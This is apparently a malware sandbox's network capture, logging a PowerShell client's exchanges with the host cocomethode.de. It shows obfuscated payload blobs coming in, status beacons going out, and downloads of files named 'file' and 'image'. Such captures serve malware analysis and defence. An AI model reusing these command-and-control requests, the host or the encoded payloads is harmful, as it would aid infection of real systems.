2024-12-11 11:44:08 UTC	1221	IN	Data Raw: 25 6d 74 79 75 76 77 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 5b 31 6d 71 4c 49 53 4c 54 7b 43 31 55 47 4c 76 65 44 79 55 4c 46 6d 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 76 58 33 34 73 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 6a 65 4a 65 6d 71 48 60 33 65 50 54 31 47 73 56 6b 4b 35 65 6d 6d 75 53 6f 4f 51 63 46 69 44 54 31 5b 60 55 6d 53 46 63 47 6d 52 60 33 75 6f 5b 6a 4f 42 53 46 48 78 4f 55 4b 60 56 44 6e 76 57 6a 62 35 65 47 4f 74 55 6f 5b 68 60 6f Data Ascii: %mtyuvwb<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#[1mqLISLT{C1UGLveDyULFmQe{CMRTOC[1mEPVeKP1HvX34sUjOqPVeKP1GoRTOC[3W2LDuKP1GoRTOC[1mEPVeKP1GoRjeJemqH`3ePT1GsVkK5emmuSoOQcFiDT1[`UmSFcGmR`3uo[jOBSFHxOUK`VDnvWjb5eGOtUo[h`o
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 5b 31 6d 45 50 56 65 4a 53 33 53 7b 58 6b 4b 4a 60 46 4b 44 62 47 6d 53 4c 46 69 59 57 47 57 35 56 6d 65 47 56 6a 71 4b 53 45 43 6f 54 54 4f 6f 62 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 66 76 55 6a 4f 6f 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 31 53 53 62 45 6d 44 54 56 38 70 53 47 47 77 60 6a 6d 49 4e 59 65 60 57 7b 57 49 58 57 65 35 63 44 79 74 50 6f 71 4f 54 55 43 4d 52 59 62 76 52 31 53 53 63 33 71 4b 53 57 4b 72 56 6c 30 72 65 57 71 55 50 6b 43 69 53 30 57 6f 56 6c 30 72 62 30 71 55 50 6f 57 5b 57 7b 47 72 52 54 65 46 65 57 71 45 50 6f 65 5b 56 47 4b 77 58 32 62 76 52 31 71 49 56 6f 43 68 53 30 5b 51 56 57 62 79 63 44 6d 44 4c 46 65 4b 60 7b 47 72 56 6d 69 52 62 46 4b 75 58 32 53 57 63 57 5b 74 58 57 69 4e 4c 46 4f 75 53 6b 43 69 57 7b 6d 30 55 47 57 Data Ascii: [1mEPVeJS3S{XkKJ`FKDbGmSLFiYWGW5VmeGVjqKSECoTTOobD82LDuKP1GoRTfvUjOoLDuDTV8oRTOC[1SSbEmDTV8pSGGw`jmINYe`W{WIXWe5cDytPoqOTUCMRYbvR1SSc3qKSWKrVl0reWqUPkCiS0WoVl0rb0qUPoW[W{GrRTeFeWqEPoe[VGKwX2bvR1qIVoChS0[QVWbycDmDLFeK`{GrVmiRbFKuX2SWcW[tXWiNLFOuSkCiW{m0UGW
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 33 65 6f 55 47 5b 42 60 46 53 49 5b 33 65 4a 53 30 71 76 58 6a 65 56 54 57 6d 58 54 6c 38 4d 54 33 75 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 54 47 5b 46 52 6c 47 52 57 6d 5b 59 54 56 79 60 57 6a 6d 45 52 6a 65 69 57 32 69 72 52 54 65 52 65 6d 71 58 55 56 65 68 63 55 6a 76 52 54 65 56 4f 46 47 58 55 6b 43 4c 60 54 4b 47 58 6b 4f 6a 65 56 4b 49 4e 56 69 60 53 33 79 30 56 6f 6a 31 65 54 79 71 52 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 54 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 6f 5b 44 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 6f 56 6c 34 4a 65 6c 4b 55 50 6b 43 69 53 30 57 6f 57 6d 5b 4a 55 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 47 63 49 57 6a Data Ascii: 3eoUG[B`FSI[3eJS0qvXjeVTWmXTl8MT3uo[YbvR1mEPVeKP1GoRTOBTG[FRlGRWm[YTVy`WjmERjeiW2irRTeRemqXUVehcUjvRTeVOFGXUkCL`TKGXkOjeVKINVi`S3y0Voj1eTyqRT4E`TGoRTOC[1mEPVeDTV8oRTOC[1mEPVeKP10oTjb4L3KudI[[W0Go[DencDmIVoChS0WoVl4JelKUPkCiS0WoWm[JUTSSc3eKP1GoRTOC[1mGcIWj
2024-12-11 11:44:08 UTC	940	IN	Data Raw: 53 53 63 33 65 4b 50 31 47 6f 5b 45 4b 6e 62 46 4b 49 57 56 38 4a 53 31 34 33 5b 47 62 30 4c 44 6d 45 4c 56 34 6a 50 31 47 32 52 30 44 76 52 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 44 69 4a 4f 56 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 30 62 30 4c 6c 48 78 65 46 79 4c 57 6c 53 72 56 56 79 4a 63 46 4f 58 57 6c 79 6b 4c 30 47 6f 55 47 5b 56 54 30 4f 55 50 56 75 56 56 44 71 7b 52 54 4c 79 54 46 53 58 54 6a 65 69 57 32 69 72 52 54 4f 52 53 57 71 58 55 6b 43 69 57 7b 57 6e 5b 44 65 72 65 6c 4b 70 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 54 34 57 57 57 72 62 44 5b 56 57 6d 71 45 57 6c 79 57 5b 31 6d 73 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 Data Ascii: SSc3eKP1Go[EKnbFKIWV8JS143[Gb0LDmELV4jP1G2R0DvR1mEPVeKRIONP3mC[1mEPVeKP1Go[DiJOVW2LDuKP1GoRTOC[1mEPVeKP1GoT0b0LlHxeFyLWlSrVVyJcFOXWlykL0GoUG[VT0OUPVuVVDq{RTLyTFSXTjeiW2irRTORSWqXUkCiW{Wn[DerelKpb14E`TGoRTOC[1mEPVeKP1GoRTT4WWWrbD[VWmqEWlyW[1msTo[jLkW{XkKF`
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 57 72 65 56 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 32 4f 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 47 42 60 46 4f 75 53 6f 53 60 56 47 4b 72 58 33 6d 6e 55 6d 6d 59 4f 56 75 5b 56 47 4b 33 58 33 34 73 4e 54 71 48 54 6f 6d 6a 57 30 57 76 56 47 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 54 46 53 58 54 6f 65 6a 56 47 4b 49 58 57 65 35 63 47 57 49 53 6b 43 69 50 32 65 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6d 6d 74 63 45 43 60 57 6b 43 73 57 31 62 34 64 57 4c 78 57 6b 57 4b 53 45 43 6f 55 57 44 76 52 31 6d 45 50 56 65 4b 50 33 75 4e 50 33 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 5b 44 69 4a 4f 54 6d 48 62 31 34 45 60 54 47 6f 52 Data Ascii: WreVOHWkCRcVy{Vm[B`FSI[2ODTV8NP3mC[1mEPVeKP1GoW{GB`FOuSoS`VGKrX3mnUmmYOVu[VGK3X34sNTqHTomjW0WvVGDvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORTFSXToejVGKIXWe5cGWISkCiP2eNP3bvR1mEPVeKP1GoRTOBXmmtcEC`WkCsW1b4dWLxWkWKSECoUWDvR1mEPVeKP3uNP3bvR1SSc3eKP1Go[DiJOTmHb14E`TGoR
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 4b 50 31 47 6f 52 54 4f 43 5b 33 4f 75 57 6b 43 6a 56 44 71 30 52 54 4f 52 63 57 6d 59 64 49 71 60 54 55 43 4d 52 54 4f 43 5b 31 6d 48 4c 44 34 45 63 6b 43 4e 50 33 62 76 52 30 71 74 57 6f 57 5b 4c 30 4b 76 58 6b 48 31 5b 30 5b 49 57 6f 71 6a 50 7b 47 57 56 6d 62 79 65 30 4b 75 63 49 4f 60 57 57 58 31 58 57 69 4e 4c 46 4c 76 53 6f 57 60 53 57 4b 72 58 6a 65 56 4c 47 71 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 6f 52 31 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 53 33 47 59 64 46 79 54 63 54 5b 31 56 6d 4f 43 4e 54 6d 45 52 6c 79 68 56 44 48 76 5b 57 4c 30 4c 46 57 48 54 56 6d 4c 50 31 47 6f 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 31 62 46 4b 74 54 6c Data Ascii: KP1GoRTOC[3OuWkCjVDq0RTORcWmYdIq`TUCMRTOC[1mHLD4EckCNP3bvR0qtWoW[L0KvXkH1[0[IWoqjP{GWVmbye0KucIO`WWX1XWiNLFLvSoW`SWKrXjeVLGqUPkeDTV8oRTOC[3OISom[W{CoR1DvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORS3GYdFyTcT[1VmOCNTmERlyhVDHv[WL0LFWHTVmLP1GoSGGw[1mEPVeKP1GoRT[1bFKtTl
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 63 46 4f 71 4f 49 57 4c 60 54 6d 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 52 46 53 77 58 57 65 35 63 44 6d 45 5b 33 38 4a 53 7b 57 72 5b 45 47 52 62 46 4b 59 57 56 65 4c 54 31 47 73 58 7b 4f 52 60 46 4f 74 54 6d 57 69 57 7b 47 72 52 30 4c 30 57 56 48 7b 54 6c 69 68 53 6a 34 72 56 55 48 34 65 57 71 48 55 56 65 4c 57 32 66 76 52 54 4f 52 57 56 47 59 4c 56 79 68 4c 30 58 76 57 55 4b 56 60 6c 48 78 4f 56 75 6b 64 56 75 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 62 47 71 71 50 56 38 56 53 30 5b 37 5b 44 4c 79 54 57 6d 58 54 6c 38 4b 50 7b 47 53 56 57 69 52 63 31 6d 45 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 60 33 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 50 79 54 6d 4f 59 60 30 5b 56 57 6c 75 Data Ascii: cFOqOIWL`TmNP3bvR1mEPVeKRFSwXWe5cDmE[38JS{Wr[EGRbFKYWVeLT1GsX{OR`FOtTmWiW{GrR0L0WVH{TlihSj4rVUH4eWqHUVeLW2fvRTORWVGYLVyhL0XvWUKV`lHxOVukdVuo[YbvR1mEPVeKP1GoRTOBbGqqPV8VS0[7[DLyTWmXTl8KP{GSVWiRc1mETl0iW2irWTeFLFGE`3eme{CMRTOC[1mEPVeKP1GoRTOC[0PyTmOY`0[VWlu
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 33 69 34 56 6d 65 46 60 33 47 59 4f 56 34 4c 60 7b 44 79 5b 44 65 56 4f 44 75 45 54 6c 30 5b 57 32 69 37 56 6d 4f 32 5b 31 6d 72 55 6d 57 53 57 6a 71 57 57 6d 57 46 53 44 6d 71 60 7b 65 44 54 56 38 73 58 6a 62 34 60 6c 44 76 53 6c 71 6b 56 47 5b 76 58 33 30 56 60 30 44 78 60 49 43 68 53 30 47 6f 54 47 4f 43 60 33 4b 58 54 6b 53 58 4c 6a 34 77 58 57 65 35 60 31 79 72 5b 46 69 69 56 47 4b 50 58 6c 30 57 63 31 30 45 60 7b 65 44 54 59 43 76 56 6c 6d 43 63 31 71 49 64 49 5b 5b 4c 6f 53 42 56 55 4f 46 4c 56 47 58 52 6c 79 60 53 54 34 77 58 57 65 35 60 31 6d 45 4c 56 79 6b 54 31 47 73 5b 44 69 4a 4c 57 71 55 60 33 65 44 54 59 40 32 53 47 47 77 5b 31 6d 45 50 56 65 54 4c 57 4b 55 57 33 75 56 57 6d 5b 73 52 6d 65 56 54 31 47 71 57 47 69 56 4c 47 71 58 5b 33 65 69 Data Ascii: 3i4VmeF`3GYOV4L`{Dy[DeVODuETl0[W2i7VmO2[1mrUmWSWjqWWmWFSDmq`{eDTV8sXjb4`lDvSlqkVG[vX30V`0Dx`IChS0GoTGOC`3KXTkSXLj4wXWe5`1yr[FiiVGKPXl0Wc10E`{eDTYCvVlmCc1qIdI[[LoSBVUOFLVGXRly`ST4wXWe5`1mELVykT1Gs[DiJLWqU`3eDTY@2SGGw[1mEPVeTLWKUW3uVWm[sRmeVT1GqWGiVLGqX[3ei
2024-12-11 11:44:08 UTC	1369	IN	Data Raw: 4b 49 57 56 65 69 53 33 79 73 56 6a 65 56 65 54 6d 45 4c 54 4b 6b 63 56 50 79 58 6d 65 56 65 56 53 47 64 49 43 6b 4c 30 47 6f 52 31 4f 4b 65 6d 6d 34 50 6f 71 6a 53 31 5b 34 5b 44 4f 43 65 6c 4b 59 63 49 57 4b 50 31 6d 71 52 56 6d 4b 5b 33 4f 49 4e 55 4f 60 56 44 71 37 58 54 65 56 62 33 4b 45 4f 56 79 6d 53 30 57 6f 55 47 5b 6a 62 46 4b 75 54 6f 5b 6a 4c 54 35 76 5b 57 65 35 63 44 6d 49 60 49 43 60 53 30 4b 72 58 6c 6d 43 5b 31 79 57 4f 59 5b 54 53 7b 6d 74 58 6f 6d 43 65 47 53 75 4e 57 47 6b 63 55 6d 75 58 57 65 35 63 44 6d 45 4c 54 5b 6d 53 30 5b 70 5b 47 69 52 62 46 48 78 4f 57 47 68 4c 6f 69 76 56 55 4f 73 5b 30 6d 74 63 49 65 5b 56 44 34 37 52 54 4c 79 53 6c 4b 75 55 6f 5b 60 53 30 5b 73 54 55 48 34 65 46 4b 59 53 6f 57 60 50 31 4b 4d 54 57 57 4b 64 Data Ascii: KIWVeiS3ysVjeVeTmELTKkcVPyXmeVeVSGdICkL0GoR1OKemm4PoqjS1[4[DOCelKYcIWKP1mqRVmK[3OINUO`VDq7XTeVb3KEOVymS0WoUG[jbFKuTo[jLT5v[We5cDmI`IC`S0KrXlmC[1yWOY[TS{mtXomCeGSuNWGkcUmuXWe5cDmELT[mS0[p[GiRbFHxOWGhLoivVUOs[0mtcIe[VD47RTLySlKuUo[`S0[sTUH4eFKYSoW`P1KMTWWKd

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:09 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596bacd29b28e3e20f4420e48c95972afcef6 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 85
2024-12-11 11:44:09 UTC	85	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
2024-12-11 11:44:10 UTC	1188	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:10 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBwL1gZ6CWOSWgrVvwPD1N9KF008BhjmwNyD7pobQ1Yq0W7n2ii1MvDS6Q7euDeGlyOT5yErQetkA8vSQBugneWseEP%2FEB%2F6OwTzAO2hlttZZXrgtoYcnYOBfjNRtVdWeQqyIkjzx%2BcW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20968&min_rtt=1044&rtt_var=27590&sent=37&recv=35&lost=0&retrans=0&sent_bytes=25881&recv_bytes=13224&delivery_rate=6494661&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05389c2e4053e4-ATL server-timing: cfL4;desc="?proto=TCP&rtt=47&min_rtt=47&rtt_var=23&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=624&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113918&min_rtt=113807&rtt_var=24098&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1029&delivery_rate=33592&cwnd=252&unsent_bytes=0&cid=170af7db1eeeb69d&ts=840&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:10 UTC	389	OUT	GET /file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:44:11 UTC	1313	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:11 GMT Content-Type: application/octet-stream Content-Length: 2684 Connection: close content-disposition: attachment; filename=file; filename*=UTF-8''file CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbae4Pgw0Vc5jhItfrpbTBpCIYvioUhdP38RAob9yJ0Qeb4yvoaCfcmHg7qsQ5CdHKNKVMTrkyj9%2BaFla4B0z5uzSzk%2FoqjqLLwqDLXUmOdrGMTj%2FiVyJW0416hIPS6LQO7ikaDOpTKX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13369&min_rtt=1185&rtt_var=19569&sent=24500&recv=11181&lost=0&retrans=0&sent_bytes=35081689&recv_bytes=134422&delivery_rate=47390163&cwnd=259&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0538a4dd668bbb-ATL server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=41&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=620&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113794&min_rtt=113737&rtt_var=24080&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1003&delivery_rate=33625&cwnd=252&unsent_bytes=0&cid=603a981ce2e2a069&ts=594&x=0"
2024-12-11 11:44:11 UTC	56	IN	Data Raw: 50 4b 03 04 14 00 08 00 08 00 9a 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 8f 3b 0e c2 30 10 44 af 62 6d 4f 36 50 20 Data Ascii: PK~\|Y_rels/.rels;0DbmO6P
2024-12-11 11:44:11 UTC	1369	IN	Data Raw: 84 e2 a4 41 48 69 a3 70 00 cb de 38 51 e2 8f 6c f3 bb 3d 2e 28 08 a2 a0 1c ed cc db 99 aa 79 98 85 dd 28 c4 c9 59 0e db a2 04 46 56 3a 35 59 cd e1 d2 9f 37 07 68 ea aa a3 45 a4 ec 88 e3 e4 23 cb 11 1b 39 8c 29 f9 23 62 94 23 19 11 0b e7 c9 e6 cb e0 82 11 29 cb a0 d1 0b 39 0b 4d b8 2b cb 3d 86 4f 06 ac 99 ac 17 41 53 e2 70 77 41 a1 72 f2 6a c8 a6 22 e3 80 b5 8a 83 9f 75 d7 aa dc ad 7f 7a fa e7 b3 1b 86 49 d2 e9 0d fa 51 e0 cb 01 0c eb 0a 57 33 eb 17 50 4b 07 08 4f 8b dd 3c a6 00 00 00 1c 01 00 00 50 4b 03 04 14 00 08 00 08 00 9a 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 77 6f 72 64 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 ad 90 cb 0a c2 30 10 45 7f 25 cc de a6 75 21 22 4d bb 11 a1 db 52 3f 20 26 d3 07 36 0f 92 Data Ascii: AHip8Ql=.(y(YFV:5Y7hE#9)#b#)9M+=OASpwArj"uzIQW3PKO<PK~\|Yword/_rels/document.xml.rels0E%u!"MR? &6
2024-12-11 11:44:11 UTC	1259	IN	Data Raw: 2d 30 a6 02 94 ad 0b 15 3a a8 ad 54 a5 2a ba 9f 2e fd 09 94 88 1a 4a 87 18 37 85 68 0c 40 ab 8b 05 8d 35 e0 d4 49 96 2b 9c 3a c7 a5 ce 8d 29 88 fb 73 a1 cc 09 5c 81 a8 41 5b bb 88 6e 11 5d 57 82 f2 85 28 bf d9 ed 14 b3 a5 cb 2c a9 7c d1 76 af 05 e8 76 45 c9 fe 89 f6 36 7b 38 2b d2 a5 01 4f 61 53 46 85 b5 6a bf 56 fd 82 3e c4 4d 99 24 4b fe 84 55 26 59 00 59 65 52 46 85 55 66 bf ca bc 47 61 30 d0 d2 e1 96 e6 ff 46 5a cd 4a 93 2c 88 ff 56 9a 7c fb 5a aa fc eb 2b af ce bf 00 50 4b 07 08 dd e8 3a 09 22 04 00 00 36 4b 00 00 50 4b 03 04 14 00 08 00 08 00 9a 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 77 6f 72 64 2f 6e 75 6d 62 65 72 69 6e 67 2e 78 6d 6c 0d 8c 41 0e c2 30 0c 04 bf 12 f9 4e 5d 38 20 14 35 ed ad 2f 80 07 84 c4 b4 95 1a bb 8a 03 81 df Data Ascii: -0:T*.J7h@5I+:)s\A[n]W(,\|vvE6{8+OaSFjV>M$KU&YYeRFUfGa0FZJ,V\|Z+PK:"6KPK~\|Yword/numbering.xmlA0N]8 5/

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:15 UTC	389	OUT	GET /file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:44:15 UTC	1315	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:15 GMT Content-Type: application/octet-stream Content-Length: 12122 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FW1kwrNDjHgamkbUlpyGfpBksAS86qAFesASiuXrnTM2rVA7Z5VRUud%2BubJZ86aPe2B6RwLHx56TnPDBjGygipqCgEilDqyRWRcNFE5BjEoF52k2l1q3ZhAIxxtXUyIog0pRn6HQoEdV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=33855&min_rtt=1044&rtt_var=25267&sent=56&recv=57&lost=0&retrans=0&sent_bytes=30668&recv_bytes=25180&delivery_rate=6494661&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0538c1a952c00b-ATL server-timing: cfL4;desc="?proto=TCP&rtt=75&min_rtt=49&rtt_var=37&sent=4&recv=6&lost=0&retrans=0&sent_bytes=973&recv_bytes=1221&delivery_rate=1336387755&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113835&min_rtt=113753&rtt_var=24131&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1003&delivery_rate=33584&cwnd=231&unsent_bytes=0&cid=7f0af3bfb524465e&ts=584&x=0"
2024-12-11 11:44:15 UTC	54	IN	Data Raw: 25 64 6e 65 74 67 71 63 75 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 Data Ascii: %dnetgqcuq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRx
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 58 33 31 34 60 6d 71 58 55 6f 71 60 57 30 47 6f 56 57 62 30 60 31 6d 48 55 6c 69 6a 63 57 5b 73 52 54 65 46 64 6a 6d 45 54 6d 43 6a 56 47 4b 32 5b 47 69 52 53 33 47 59 64 46 79 57 53 31 58 76 58 54 4f 4b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 4f 75 57 6b 43 6a 56 44 71 30 52 54 4f 52 4c 46 4f 74 57 6c 79 44 54 56 38 6f 52 54 4f 43 5b 33 5b 55 50 6c 71 5b 56 47 4b 70 58 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 55 6a 5b 55 57 56 69 48 57 6b 40 30 55 6d 4b 46 53 56 65 4a 53 6b 69 30 54 6d 69 6e 60 6d 71 58 50 6b 43 69 57 7b 6d 30 55 46 72 79 63 46 4c 7b 55 6c 69 60 4c 6d 54 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 Data Ascii: rudl/Bnowdsu\;;GsnlC`rd75Rushof)#X314`mqXUoq`W0GoVWb0`1mHUlijcW[sRTeFdjmETmCjVGK2[GiRS3GYdFyWS1XvXTOKUjOqPVeKP1GoRTOC[3OuWkCjVDq0RTORLFOtWlyDTV8oRTOC[3[UPlq[VGKpXTOBO1SSc3eKP1GoRTOC[1mFUj[UWViHWk@0UmKFSVeJSki0Tmin`mqXPkCiW{m0UFrycFL{Uli`LmT2SGGw[1mEPVeKP1
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 63 45 43 60 57 7b 43 6f 55 47 5b 42 60 46 53 49 5b 33 65 4a 53 30 4b 72 58 7b 4f 52 62 46 4b 75 53 6b 43 69 57 7b 6d 30 55 32 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 66 76 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 60 6d 6d 58 54 6c 71 69 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 54 76 57 6a 71 55 53 56 53 58 57 46 72 79 53 57 57 55 50 56 6d 52 63 56 79 7b 56 6d 4f 42 60 46 4b 48 52 6c 79 5b 57 30 48 30 52 54 65 56 4f 46 47 58 55 6b 43 6b 64 54 4b 6e 5b 44 4f 43 60 30 71 49 57 6f 71 6a 53 33 79 30 56 57 69 52 62 46 48 78 4f 49 57 4b 53 57 4b 33 5b 45 48 30 62 33 48 Data Ascii: cEC`W{CoUG[B`FSI[3eJS0KrX{ORbFKuSkCiW{m0U2bvR1mEPVeKP1GoRTOC[1mEPVeKP1GoRTfvUjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOB`mmXTlqiRIONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1GoRTOC[0TvWjqUSVSXWFrySWWUPVmRcVy{VmOB`FKHRly[W0H0RTeVOFGXUkCkdTKn[DOC`0qIWoqjS3y0VWiRbFHxOIWKSWK3[EH0b3H
